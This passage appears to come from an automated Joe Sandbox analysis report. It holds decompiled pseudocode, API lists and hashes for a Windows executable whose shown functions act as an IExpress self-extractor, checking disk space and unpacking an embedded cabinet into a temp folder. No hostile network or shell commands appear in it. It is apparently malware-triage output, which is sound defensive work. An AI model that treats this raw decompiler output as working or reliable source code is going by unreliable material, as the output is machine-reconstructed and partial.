                                                                                                                                                                                                                                              				signed int _v804;
                                                                                                                                                                                                                                              				long _v808;
                                                                                                                                                                                                                                              				int _v812;
                                                                                                                                                                                                                                              				long _v816;
                                                                                                                                                                                                                                              				long _v820;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t46;
                                                                                                                                                                                                                                              				int _t50;
                                                                                                                                                                                                                                              				signed int _t55;
                                                                                                                                                                                                                                              				void* _t66;
                                                                                                                                                                                                                                              				int _t69;
                                                                                                                                                                                                                                              				signed int _t73;
                                                                                                                                                                                                                                              				signed short _t78;
                                                                                                                                                                                                                                              				signed int _t87;
				signed int _t101;
				int _t102;
				unsigned int _t103;
				unsigned int _t105;
				signed int _t111;
				long _t112;
				signed int _t116;
				CHAR* _t118;
				signed int _t119;
				signed int _t120;

				_t114 = __edi;
				_t46 =  *0x978004; // 0x694569f9
				_v8 = _t46 ^ _t120;
				_v804 = __edx;
				_t118 = __ecx;
				GetCurrentDirectoryA(0x104,  &_v276);
				_t50 = SetCurrentDirectoryA(_t118); // executed
				if(_t50 != 0) {
					_push(__edi);
					_v796 = 0;
					_v792 = 0;
					_v800 = 0;
					_v808 = 0;
					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
					__eflags = _t55;
					if(_t55 == 0) {
						L29:
						memset( &_v788, 0, 0x200);
						 *0x979124 = E00976285();
						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
						_t110 = 0x4b0;
						L30:
						__eflags = 0;
						E009744B9(0, _t110, _t118,  &_v788, 0x10, 0);
						SetCurrentDirectoryA( &_v276);
						L31:
						_t66 = 0;
						__eflags = 0;
						L32:
						_pop(_t114);
						goto L33;
					}
					_t69 = _v792 * _v796;
					_v812 = _t69;
					_t116 = MulDiv(_t69, _v800, 0x400);
					__eflags = _t116;
					if(_t116 == 0) {
						goto L29;
					}
					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
					__eflags = _t73;
					if(_t73 != 0) {
						SetCurrentDirectoryA( &_v276); // executed
						_t101 =  &_v16;
						_t111 = 6;
						_t119 = _t118 - _t101;
						__eflags = _t119;
						while(1) {
							_t22 = _t111 - 4; // 0x2
							__eflags = _t22;
							if(_t22 == 0) {
								break;
							}
							_t87 =  *((intOrPtr*)(_t119 + _t101));
							__eflags = _t87;
							if(_t87 == 0) {
								break;
							}
							 *_t101 = _t87;
							_t101 = _t101 + 1;
							_t111 = _t111 - 1;
							__eflags = _t111;
							if(_t111 != 0) {
								continue;
							}
							break;
						}
						__eflags = _t111;
						if(_t111 == 0) {
							_t101 = _t101 - 1;
							__eflags = _t101;
						}
						 *_t101 = 0;
						_t112 = 0x200;
						_t102 = _v812;
						_t78 = 0;
						_t118 = 8;
						while(1) {
							__eflags = _t102 - _t112;
							if(_t102 == _t112) {
								break;
							}
							_t112 = _t112 + _t112;
							_t78 = _t78 + 1;
							__eflags = _t78 - _t118;
							if(_t78 < _t118) {
								continue;
							}
							break;
						}
						__eflags = _t78 - _t118;
						if(_t78 != _t118) {
							__eflags =  *0x979a34 & 0x00000008;
							if(( *0x979a34 & 0x00000008) == 0) {
								L20:
								_t103 =  *0x979a38; // 0x0
								_t110 =  *((intOrPtr*)(0x9789e0 + (_t78 & 0x0000ffff) * 4));
								L21:
								__eflags = (_v804 & 0x00000003) - 3;
								if((_v804 & 0x00000003) != 3) {
									__eflags = _v804 & 0x00000001;
									if((_v804 & 0x00000001) == 0) {
										__eflags = _t103 - _t116;
									} else {
										__eflags = _t110 - _t116;
									}
								} else {
									__eflags = _t103 + _t110 - _t116;
								}
								if(__eflags <= 0) {
									 *0x979124 = 0;
									_t66 = 1;
								} else {
									_t66 = E0097268B(_a4, _t110, _t103,  &_v16);
								}
								goto L32;
							}
							__eflags = _v816 & 0x00008000;
							if((_v816 & 0x00008000) == 0) {
								goto L20;
							}
							_t105 =  *0x979a38; // 0x0
							_t110 =  *((intOrPtr*)(0x9789e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0x9789e0 + (_t78 & 0x0000ffff) * 4));
							_t103 = (_t105 >> 2) +  *0x979a38;
							goto L21;
						}
						_t110 = 0x4c5;
                                                                                                                                                                                                                                              						E009744B9(0, 0x4c5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              						goto L31;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					memset( &_v788, 0, 0x200);
                                                                                                                                                                                                                                              					 *0x979124 = E00976285();
                                                                                                                                                                                                                                              					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                                                                                                                                                                                              					_t110 = 0x4f9;
                                                                                                                                                                                                                                              					goto L30;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_t110 = 0x4bc;
                                                                                                                                                                                                                                              					E009744B9(0, 0x4bc, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              					 *0x979124 = E00976285();
                                                                                                                                                                                                                                              					_t66 = 0;
                                                                                                                                                                                                                                              					L33:
                                                                                                                                                                                                                                              					return E00976CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              			}



































                                                                                                                                                                                                                                              0x00975b9e
                                                                                                                                                                                                                                              0x00975b87
                                                                                                                                                                                                                                              0x00975b8f
                                                                                                                                                                                                                                              0x00975b8f
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975b85
                                                                                                                                                                                                                                              0x00975b29
                                                                                                                                                                                                                                              0x00975b33
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975b35
                                                                                                                                                                                                                                              0x00975b48
                                                                                                                                                                                                                                              0x00975b4a
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975b4a
                                                                                                                                                                                                                                              0x00975b0f
                                                                                                                                                                                                                                              0x00975b16
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00975b16
                                                                                                                                                                                                                                              0x00975a7c
                                                                                                                                                                                                                                              0x00975a8a
                                                                                                                                                                                                                                              0x00975aa5
                                                                                                                                                                                                                                              0x00975aab
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x009759bb
                                                                                                                                                                                                                                              0x009759c0
                                                                                                                                                                                                                                              0x009759c7
                                                                                                                                                                                                                                              0x009759d1
                                                                                                                                                                                                                                              0x009759d6
                                                                                                                                                                                                                                              0x00975c05
                                                                                                                                                                                                                                              0x00975c14
                                                                                                                                                                                                                                              0x00975c14

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 009759A8
                                                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNELBASE(?), ref: 009759AF
                                                                                                                                                                                                                                              • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 00975A13
                                                                                                                                                                                                                                              • MulDiv.KERNEL32(?,?,00000400), ref: 00975A40
                                                                                                                                                                                                                                              • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00975A64
                                                                                                                                                                                                                                              • memset.MSVCRT ref: 00975A7C
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00975A98
                                                                                                                                                                                                                                              • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00975AA5
                                                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 00975BFC
                                                                                                                                                                                                                                                • Part of subcall function 009744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00974518
                                                                                                                                                                                                                                                • Part of subcall function 009744B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00974554
                                                                                                                                                                                                                                                • Part of subcall function 00976285: GetLastError.KERNEL32(00975BBC), ref: 00976285
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4237285672-0
                                                                                                                                                                                                                                              • Opcode ID: fd857b9829275cd78ad6a90774c0b2af1265c6081f70d892646c038c5039c8ab
                                                                                                                                                                                                                                              • Instruction ID: 4f89ec62a2a54d08a5557519d8660af7236cc3fc54b3b6c293d43abd1a77061d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fd857b9829275cd78ad6a90774c0b2af1265c6081f70d892646c038c5039c8ab
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4971C3B3A1420CAFEB559B60CC85FFB77ACEB88300F4584A9F54DD2140EA749E84DB60
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 77%
                                                                                                                                                                                                                                              			E00974FE0(void* __edi, void* __eflags) {
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* _t8;
                                                                                                                                                                                                                                              				struct HWND__* _t9;
                                                                                                                                                                                                                                              				int _t10;
                                                                                                                                                                                                                                              				void* _t12;
                                                                                                                                                                                                                                              				struct HWND__* _t24;
                                                                                                                                                                                                                                              				struct HWND__* _t27;
                                                                                                                                                                                                                                              				intOrPtr _t29;
                                                                                                                                                                                                                                              				void* _t33;
                                                                                                                                                                                                                                              				int _t34;
                                                                                                                                                                                                                                              				CHAR* _t36;
                                                                                                                                                                                                                                              				int _t37;
                                                                                                                                                                                                                                              				intOrPtr _t47;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t33 = __edi;
                                                                                                                                                                                                                                              				_t36 = "CABINET";
                                                                                                                                                                                                                                              				 *0x979144 = E0097468F(_t36, 0, 0);
                                                                                                                                                                                                                                              				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
                                                                                                                                                                                                                                              				 *0x979140 = _t8;
                                                                                                                                                                                                                                              				if(_t8 == 0) {
                                                                                                                                                                                                                                              					return _t8;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t9 =  *0x978584; // 0x0
                                                                                                                                                                                                                                              				if(_t9 != 0) {
                                                                                                                                                                                                                                              					ShowWindow(GetDlgItem(_t9, 0x842), 0);
                                                                                                                                                                                                                                              					ShowWindow(GetDlgItem( *0x978584, 0x841), 5);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t10 = E00974EFD(0, 0);
                                                                                                                                                                                                                                              				if(_t10 != 0) {
                                                                                                                                                                                                                                              					__imp__#20(E00974CA0, E00974CC0, E00974980, E00974A50, E00974AD0, E00974B60, E00974BC0, 1, 0x979148, _t33);
                                                                                                                                                                                                                                              					_t34 = _t10;
                                                                                                                                                                                                                                              					if(_t34 == 0) {
                                                                                                                                                                                                                                              						L8:
                                                                                                                                                                                                                                              						_t29 =  *0x979148; // 0x0
                                                                                                                                                                                                                                              						_t24 =  *0x978584; // 0x0
                                                                                                                                                                                                                                              						E009744B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              						_t37 = 0;
                                                                                                                                                                                                                                              						L9:
                                                                                                                                                                                                                                              						goto L10;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					__imp__#22(_t34, "*MEMCAB", 0x971140, 0, E00974CD0, 0, 0x979140); // executed
                                                                                                                                                                                                                                              					_t37 = _t10;
                                                                                                                                                                                                                                              					if(_t37 == 0) {
                                                                                                                                                                                                                                              						goto L9;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					__imp__#23(_t34); // executed
                                                                                                                                                                                                                                              					if(_t10 != 0) {
                                                                                                                                                                                                                                              						goto L9;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					goto L8;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_t27 =  *0x978584; // 0x0
                                                                                                                                                                                                                                              					E009744B9(_t27, 0x4ba, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              					_t37 = 0;
                                                                                                                                                                                                                                              					L10:
                                                                                                                                                                                                                                              					_t12 =  *0x979140; // 0x0
                                                                                                                                                                                                                                              					if(_t12 != 0) {
                                                                                                                                                                                                                                              						FreeResource(_t12);
                                                                                                                                                                                                                                              						 *0x979140 = 0;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					if(_t37 == 0) {
                                                                                                                                                                                                                                              						_t47 =  *0x9791d8; // 0x0
                                                                                                                                                                                                                                              						if(_t47 == 0) {
                                                                                                                                                                                                                                              							E009744B9(0, 0x4f8, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					if(( *0x978a38 & 0x00000001) == 0 && ( *0x979a34 & 0x00000001) == 0) {
                                                                                                                                                                                                                                              						SendMessageA( *0x978584, 0xfa1, _t37, 0);
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					return _t37;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              			}

















                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009746A0
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: SizeofResource.KERNEL32(00000000,00000000,?,00972D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009746A9
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009746C3
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: LoadResource.KERNEL32(00000000,00000000,?,00972D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009746CC
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: LockResource.KERNEL32(00000000,?,00972D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009746D3
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: memcpy_s.MSVCRT ref: 009746E5
                                                                                                                                                                                                                                                • Part of subcall function 0097468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 009746EF
                                                                                                                                                                                                                                              • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 00974FFE
                                                                                                                                                                                                                                              • LoadResource.KERNEL32(00000000,00000000), ref: 00975006
                                                                                                                                                                                                                                              • LockResource.KERNEL32(00000000), ref: 0097500D
                                                                                                                                                                                                                                              • GetDlgItem.USER32(00000000,00000842), ref: 00975030
                                                                                                                                                                                                                                              • ShowWindow.USER32(00000000), ref: 00975037
                                                                                                                                                                                                                                              • GetDlgItem.USER32(00000841,00000005), ref: 0097504A
                                                                                                                                                                                                                                              • ShowWindow.USER32(00000000), ref: 00975051
                                                                                                                                                                                                                                              • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 00975111
                                                                                                                                                                                                                                              • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 00975159
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
• Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.425785812.000000000097A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.425785812.000000000097C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                                                                                                                                                                                              • String ID: *MEMCAB$CABINET
                                                                                                                                                                                                                                              • API String ID: 1305606123-2642027498
                                                                                                                                                                                                                                              • Opcode ID: 1386ef88cc103e1f98210af7566dec3e67deb58f4f87f7c77a3b98220f82deb8
                                                                                                                                                                                                                                              • Instruction ID: bbed4359529f06e5414c25fbab6a0daea8c07ea4b067e8477674ad931dfc7914
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1386ef88cc103e1f98210af7566dec3e67deb58f4f87f7c77a3b98220f82deb8
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CE3107B379C301AFE7205B61AC8DF6B379CF785759F458024F90DA21A2DBB4CC80A655
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 450 972f1d-972f3d 451 972f3f-972f46 450->451 452 972f6c-972f73 call 975164 450->452 453 972f5f-972f66 call 973a3f 451->453 454 972f48 call 9751e5 451->454 459 973041 452->459 460 972f79-972f80 call 9755a0 452->460 453->452 453->459 461 972f4d-972f4f 454->461 464 973043-973053 call 976ce0 459->464 460->459 468 972f86-972fbe GetSystemDirectoryA call 97658a LoadLibraryA 460->468 461->459 465 972f55-972f5d 461->465 465->452 465->453 472 972ff7-973004 FreeLibrary 468->472 473 972fc0-972fd4 GetProcAddress 468->473 475 973017-973024 SetCurrentDirectoryA 472->475 476 973006-97300c 472->476 473->472 474 972fd6-972fee DecryptFileA 473->474 474->472 486 972ff0-972ff5 474->486 477 973026-97303c call 9744b9 call 976285 475->477 478 973054-97305a 475->478 476->475 479 97300e call 97621e 476->479 477->459 482 973065-97306c 478->482 483 97305c call 973b26 478->483 490 973013-973015 479->490 488 97306e-973075 call 97256d 482->488 489 97307c-973089 482->489 495 973061-973063 483->495 486->472 496 97307a 488->496 492 9730a1-9730a9 489->492 493 97308b-973091 489->493 490->459 490->475 499 9730b4-9730b7 492->499 500 9730ab-9730ad 492->500 493->492 497 973093 call 973ba2 493->497 495->459 495->482 496->489 503 973098-97309a 497->503 499->464 500->499 502 9730af call 974169 500->502 502->499 503->459 505 97309c 503->505 505->492
                                                                                                                                                                                                                                              C-Code - Quality: 82%
                                                                                                                                                                                                                                              			E00972F1D(void* __ecx, int __edx) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v272;
                                                                                                                                                                                                                                              				_Unknown_base(*)()* _v276;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t9;
                                                                                                                                                                                                                                              				void* _t11;
                                                                                                                                                                                                                                              				struct HWND__* _t12;
                                                                                                                                                                                                                                              				void* _t14;
                                                                                                                                                                                                                                              				int _t21;
                                                                                                                                                                                                                                              				signed int _t22;
                                                                                                                                                                                                                                              				signed int _t25;
                                                                                                                                                                                                                                              				intOrPtr* _t26;
                                                                                                                                                                                                                                              				signed int _t27;
                                                                                                                                                                                                                                              				void* _t30;
                                                                                                                                                                                                                                              				_Unknown_base(*)()* _t31;
                                                                                                                                                                                                                                              				void* _t34;
                                                                                                                                                                                                                                              				struct HINSTANCE__* _t36;
                                                                                                                                                                                                                                              				intOrPtr _t41;
                                                                                                                                                                                                                                              				intOrPtr* _t44;
                                                                                                                                                                                                                                              				signed int _t46;
                                                                                                                                                                                                                                              				int _t47;
                                                                                                                                                                                                                                              				void* _t58;
                                                                                                                                                                                                                                              				void* _t59;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t43 = __edx;
                                                                                                                                                                                                                                              				_t9 =  *0x978004; // 0x694569f9
                                                                                                                                                                                                                                              				_v8 = _t9 ^ _t46;
                                                                                                                                                                                                                                              				if( *0x978a38 != 0) {
                                                                                                                                                                                                                                              					L5:
                                                                                                                                                                                                                                              					_t11 = E00975164(_t52);
                                                                                                                                                                                                                                              					_t53 = _t11;
                                                                                                                                                                                                                                              					if(_t11 == 0) {
                                                                                                                                                                                                                                              						L16:
                                                                                                                                                                                                                                              						_t12 = 0;
                                                                                                                                                                                                                                              						L17:
                                                                                                                                                                                                                                              						return E00976CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t14 = E009755A0(_t53); // executed
                                                                                                                                                                                                                                              					if(_t14 == 0) {
                                                                                                                                                                                                                                              						goto L16;
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						_t45 = 0x105;
                                                                                                                                                                                                                                              						GetSystemDirectoryA( &_v272, 0x105);
                                                                                                                                                                                                                                              						_t43 = 0x105;
                                                                                                                                                                                                                                              						_t40 =  &_v272;
                                                                                                                                                                                                                                              						E0097658A( &_v272, 0x105, "advapi32.dll");
                                                                                                                                                                                                                                              						_t36 = LoadLibraryA( &_v272);
                                                                                                                                                                                                                                              						_t44 = 0;
                                                                                                                                                                                                                                              						if(_t36 != 0) {
                                                                                                                                                                                                                                              							_t31 = GetProcAddress(_t36, "DecryptFileA");
                                                                                                                                                                                                                                              							_v276 = _t31;
                                                                                                                                                                                                                                              							if(_t31 != 0) {
                                                                                                                                                                                                                                              								_t45 = _t47;
                                                                                                                                                                                                                                              								_t40 = _t31;
                                                                                                                                                                                                                                              								 *0x97a288("C:\Users\jones\AppData\Local\Temp\IXP000.TMP\", 0); // executed
                                                                                                                                                                                                                                              								_v276();
                                                                                                                                                                                                                                              								if(_t47 != _t47) {
                                                                                                                                                                                                                                              									_t40 = 4;
                                                                                                                                                                                                                                              									asm("int 0x29");
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						FreeLibrary(_t36);
                                                                                                                                                                                                                                              						_t58 =  *0x978a24 - _t44; // 0x0
                                                                                                                                                                                                                                              						if(_t58 != 0) {
                                                                                                                                                                                                                                              							L14:
                                                                                                                                                                                                                                              							_t21 = SetCurrentDirectoryA("C:\Users\jones\AppData\Local\Temp\IXP000.TMP\"); // executed
                                                                                                                                                                                                                                              							if(_t21 != 0) {
                                                                                                                                                                                                                                              								__eflags =  *0x978a2c - _t44; // 0x0
                                                                                                                                                                                                                                              								if(__eflags != 0) {
                                                                                                                                                                                                                                              									L20:
                                                                                                                                                                                                                                              									__eflags =  *0x978d48 & 0x000000c0;
                                                                                                                                                                                                                                              									if(( *0x978d48 & 0x000000c0) == 0) {
                                                                                                                                                                                                                                              										_t41 =  *0x979a40; // 0x3, executed
                                                                                                                                                                                                                                              										_t26 = E0097256D(_t41); // executed
                                                                                                                                                                                                                                              										_t44 = _t26;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              									_t22 =  *0x978a24; // 0x0
                                                                                                                                                                                                                                              									 *0x979a44 = _t44;
                                                                                                                                                                                                                                              									__eflags = _t22;
                                                                                                                                                                                                                                              									if(_t22 != 0) {
                                                                                                                                                                                                                                              										L26:
                                                                                                                                                                                                                                              										__eflags =  *0x978a38;
                                                                                                                                                                                                                                              										if( *0x978a38 == 0) {
                                                                                                                                                                                                                                              											__eflags = _t22;
                                                                                                                                                                                                                                              											if(__eflags == 0) {
                                                                                                                                                                                                                                              												E00974169(__eflags);
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              										_t12 = 1;
                                                                                                                                                                                                                                              										goto L17;
                                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                                              										__eflags =  *0x979a30 - _t22; // 0x0
                                                                                                                                                                                                                                              										if(__eflags != 0) {
                                                                                                                                                                                                                                              											goto L26;
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              										_t25 = E00973BA2(); // executed
                                                                                                                                                                                                                                              										__eflags = _t25;
                                                                                                                                                                                                                                              										if(_t25 == 0) {
                                                                                                                                                                                                                                              											goto L16;
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              										_t22 =  *0x978a24; // 0x0
                                                                                                                                                                                                                                              										goto L26;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								_t27 = E00973B26(_t40, _t44);
                                                                                                                                                                                                                                              								__eflags = _t27;
                                                                                                                                                                                                                                              								if(_t27 == 0) {
                                                                                                                                                                                                                                              									goto L16;
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              								goto L20;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_t43 = 0x4bc;
                                                                                                                                                                                                                                              							E009744B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
                                                                                                                                                                                                                                              							 *0x979124 = E00976285();
                                                                                                                                                                                                                                              							goto L16;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t59 =  *0x979a30 - _t44; // 0x0
                                                                                                                                                                                                                                              						if(_t59 != 0) {
                                                                                                                                                                                                                                              							goto L14;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t30 = E0097621E(); // executed
                                                                                                                                                                                                                                              						if(_t30 == 0) {
                                                                                                                                                                                                                                              							goto L16;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						goto L14;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t49 =  *0x978a24;
                                                                                                                                                                                                                                              				if( *0x978a24 != 0) {
                                                                                                                                                                                                                                              					L4:
                                                                                                                                                                                                                                              					_t34 = E00973A3F(_t51);
                                                                                                                                                                                                                                              					_t52 = _t34;
                                                                                                                                                                                                                                              					if(_t34 == 0) {
                                                                                                                                                                                                                                              						goto L16;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					goto L5;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				if(E009751E5(_t49) == 0) {
                                                                                                                                                                                                                                              					goto L16;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t51 =  *0x978a38;
                                                                                                                                                                                                                                              				if( *0x978a38 != 0) {
                                                                                                                                                                                                                                              					goto L5;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				goto L4;
                                                                                                                                                                                                                                              			}
                                                                                                                                                                                                                                              0x0097303c
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x0097303c
                                                                                                                                                                                                                                              0x00973006
                                                                                                                                                                                                                                              0x0097300c
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x0097300e
                                                                                                                                                                                                                                              0x00973015
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00973015
                                                                                                                                                                                                                                              0x00972f80
                                                                                                                                                                                                                                              0x00972f3f
                                                                                                                                                                                                                                              0x00972f46
                                                                                                                                                                                                                                              0x00972f5f
                                                                                                                                                                                                                                              0x00972f5f
                                                                                                                                                                                                                                              0x00972f64
                                                                                                                                                                                                                                              0x00972f66
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00972f66
                                                                                                                                                                                                                                              0x00972f4f
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00972f55
                                                                                                                                                                                                                                              0x00972f5d
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000

APIs
• GetSystemDirectoryA.KERNEL32 ref: 00972F93
• LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 00972FB2
• GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 00972FC6
• DecryptFileA.ADVAPI32 ref: 00972FE6
• FreeLibrary.KERNEL32(00000000), ref: 00972FF8
• SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 0097301C
  • Part of subcall function 009751E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00972F4D,?,00000002,00000000), ref: 00975201
Strings
Memory Dump Source
• Source File: 00000000.00000002.425756198.0000000000971000.00000020.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
• Associated: 00000000.00000002.425746589.0000000000970000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.425770943.0000000000978000.00000004.00000001.01000000.00000003.sdmp
